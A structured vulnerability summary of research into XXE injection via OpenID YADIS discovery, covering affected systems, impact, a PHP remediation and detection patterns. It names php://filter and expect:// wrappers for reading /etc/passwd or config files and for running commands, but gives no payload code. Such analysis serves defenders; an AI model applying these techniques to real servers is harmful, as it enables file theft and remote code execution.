Full Report
Recently a security researcher reported a bug in Facebook that could potentially allow Remote Code Execution (RCE). His writeup of the incident is available here if you are interested. The thing that caught my attention about his writeup was not the fact that he had pwned Facebook or earned $33,500 doing it, but the fact that he used OpenID to accomplish this. After having a quick look at the output from the PoC and rereading the vulnerability description I had a pretty good idea of how the vulnerability was triggered and decided to see if any other platforms were vulnerable.
Analysis Summary
# Vulnerability: XXE Injection via OpenID YADIS Discovery Leading to File Read and Potential RCE
## CVE Details
- CVE ID: N/A (This article discusses a specific platform's vulnerability found via general research based on a Facebook incident, and does not assign a specific CVE in the text provided.)
- CVSS Score: N/A
- CWE: CWE-611 (Improper Restriction of XML External Entity References in Inclusion of XML External Entities (XXE))
## Affected Systems
- Products: Open Source Social Platform utilizing OpenID authentication with vulnerable XML parsing during YADIS discovery (Specific platform instance mentioned was a "popular, OpenSource, Social platform").
- Versions: Not specified (Affects any version processing untrusted XRDS documents during OpenID discovery without entity loader disabled).
- Configurations: Systems configured to use OpenID authentication relying on YADIS discovery mechanism and using an XML parser vulnerable to XXE.
## Vulnerability Description
The vulnerability arises during the OpenID discovery process, specifically when the server processes the YADIS discovery method. YADIS relies on fetching an XRDS document, which is formatted as XML. If the application's XML parser is configured to process external entities (DTD inclusion), an attacker can supply a malicious OpenID endpoint URL. When the victim server performs discovery, it fetches the attacker-controlled XRDS document. This document contains an XML External Entity (XXE) payload that forces the server to request specified internal/external resources or execute code if using specific stream wrappers (like `expect://`). This results in information disclosure (file read) or potential Remote Code Execution (RCE).
The successful exploitation outlined involves using the PHP `php://filter` wrapper to read local files (e.g., `/etc/passwd` or `config.php`) and outputting the base64-encoded content in the URL response upon re-initiating the discovery process. Furthermore, the `expect://` wrapper was leveraged to achieve RCE by executing system commands (e.g., `id`).
## Exploitation
- Status: PoC available (The author created and demonstrated a functional PoC XRDS document for file reading and RCE emulation on a test platform).
- Complexity: Medium (Requires understanding of OpenID discovery, XXE, and specific PHP wrappers for escalation).
- Attack Vector: Network (Attacker controls the external entity definition served by an identity provider endpoint).
## Impact
- Confidentiality: High (Allows reading arbitrary local files, including configuration files containing credentials).
- Integrity: High (Potential to execute arbitrary code on the server).
- Availability: Low (Impact is primarily focused on data compromise, although RCE could lead to service disruption).
## Remediation
### Patches
- Specific patch versions for the mentioned "OpenSource Social Platform" are not provided in the text.
### Workarounds
- **PHP Specific Mitigation:** Set the library configuration to disable external entity loading when using the default XML parser:
php
libxml_disable_entity_loader(true);
- Ensure that the OpenID implementation validates and sanitizes the received identity endpoint metadata to prevent redirection or processing of untrusted, malicious XML structures.
## Detection
- **Indicators of Compromise:** Outbound network requests originating from the web server process targeting internal network resources or unusual HTTP/S requests associated with the OpenID discovery mechanism. Look for requests involving file paths or unusual URI schemes being referenced in server logs during OpenID authentication attempts.
- **Detection Methods and Tools:** Configure Web Application Firewalls (WAFs) or IDS/IPS systems to inspect OpenID request parameters for suspicious XML structure indicators (e.g., `<!DOCTYPE`, `&ENTITY;`). Monitor server ingress/egress logs for unexpected resource fetches occurring immediately following an OpenID authentication initiation.
## References
- Vendor advisories: N/A (The article discusses research based on a public disclosure regarding Facebook).
- Relevant links - defanged:
- SensePost Article Link: sensepost com/revisiting-xxe-and-abusing-protocols/
- OWASP XXE Reference: owasp org/index php/XML_External_Entity_(XXE)_Processing
- PHP Security Tips: phpsecurity readthedocs org/en/latest/Injection-Attacks html